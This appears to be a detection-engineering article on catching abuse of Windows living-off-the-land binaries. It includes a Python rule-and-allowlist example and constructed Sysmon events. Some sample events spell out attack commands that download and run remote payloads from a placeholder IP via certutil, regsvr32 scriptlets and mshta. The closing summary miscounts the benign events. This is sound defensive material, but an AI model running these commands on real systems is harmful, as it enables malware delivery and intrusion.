Detection Engineering
Detecting Living-off-the-Land Binaries
How to detect LOLBins without false positives — flag abuse of certutil, regsvr32, mshta and rundll32 by behavior, with a Sigma rule and allowlist tuning.
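The behavioral approach the summary describes, as an added example that is not the article's own code or Sigma rule: each LOLBin gets a small set of command-line patterns that capture how it is abused (download/decode for certutil, scriptlet loading for regsvr32, inline or remote script for mshta, script and user-writable DLL paths for rundll32), and an allowlist keyed on rule, parent process and command line suppresses known-good uses. The event shape follows Sysmon Event ID 1 fields (Image, CommandLine, ParentImage); the rule names, patterns, hostnames, parent images and allowlist entries are assumptions chosen for illustration, and the sample events are constructed.

```python
"""Behavioral LOLBin detection with allowlist tuning (added example, not the article's code)."""
import os
import re
from dataclasses import dataclass, field


@dataclass
class Rule:
    name: str
    image: str            # lower-case basename of the LOLBin this rule watches
    patterns: list        # command-line regexes; any match fires the rule
    compiled: list = field(default_factory=list, init=False, repr=False)

    def __post_init__(self):
        self.compiled = [re.compile(p, re.IGNORECASE) for p in self.patterns]

    def matches(self, cmdline):
        return any(p.search(cmdline) for p in self.compiled)


# Assumed rule set: patterns describe behavior, not the mere presence of the binary.
RULES = [
    # certutil used as a downloader or as a base64 decoder/encoder
    Rule("certutil_download_or_decode", "certutil.exe",
         [r"-urlcache\b", r"-decode\b", r"-encode\b", r"https?://"]),
    # regsvr32 loading a scriptlet (Squiblydoo-style) or a remote /i: argument
    Rule("regsvr32_scriptlet", "regsvr32.exe",
         [r"/i:\s*https?://", r"scrobj\.dll", r"\.sct\b"]),
    # mshta running inline script or a remote HTA
    Rule("mshta_inline_or_remote", "mshta.exe",
         [r"https?://", r"javascript:", r"vbscript:", r"about:"]),
    # rundll32 running inline script, a DLL from a user-writable path, or url.dll handlers
    Rule("rundll32_suspicious", "rundll32.exe",
         [r"javascript:", r"\\temp\\", r"\\appdata\\", r"\\users\\public\\",
          r"url\.dll,\s*(FileProtocolHandler|OpenURL)"]),
]

# Allowlist tuning: (rule name, parent basename, command-line regex). Constructed entries
# standing in for an environment's known-good uses; each one is as narrow as possible.
ALLOWLIST = [
    ("certutil_download_or_decode", "deploy.exe",
     r"-urlcache .*https://updates\.example\.internal/"),
    ("rundll32_suspicious", "explorer.exe",
     r"^rundll32\.exe url\.dll,FileProtocolHandler https://[\w.-]+\.example\.internal/"),
]


def basename(path):
    """Lower-case file name of a Windows path, portable to non-Windows hosts."""
    return os.path.basename(path.replace("\\", "/")).lower()


def allowlisted(rule_name, parent_image, cmdline):
    parent = basename(parent_image)
    return any(name == rule_name and parent == allowed_parent
               and re.search(cmd_re, cmdline, re.IGNORECASE)
               for name, allowed_parent, cmd_re in ALLOWLIST)


def evaluate(event):
    """Rule names fired by one process-creation event, after allowlist suppression."""
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    return [r.name for r in RULES
            if r.image == image and r.matches(cmd) and not allowlisted(r.name, parent, cmd)]


def detections(events):
    """(rule name, command line) pairs for every event that fires."""
    return [(name, ev["CommandLine"]) for ev in events for name in evaluate(ev)]


# Constructed Sysmon-style events (Event ID 1 field names); IPs and hosts are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\Users\Public\p.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -verify -urlfetch C:\certs\server.cer"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendorlib.dll"'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe http://198.51.100.7/payload.hta"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe url.dll,FileProtocolHandler https://intranet.example.internal/portal"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\upd.dll,Start"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Program Files\Deploy\deploy.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://updates.example.internal/cert.cer C:\ProgramData\deploy\cert.cer"},
]

if __name__ == "__main__":
    for name, cmd in detections(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

Of the nine constructed events, four fire (the certutil download, the regsvr32 scriptlet load, the remote HTA and the rundll32 DLL from Temp); the two benign certutil/regsvr32/rundll32 uses never match a pattern, and the two legitimate-but-pattern-matching cases are suppressed by allowlist entries that pin the parent process and the destination host rather than excluding the binary outright.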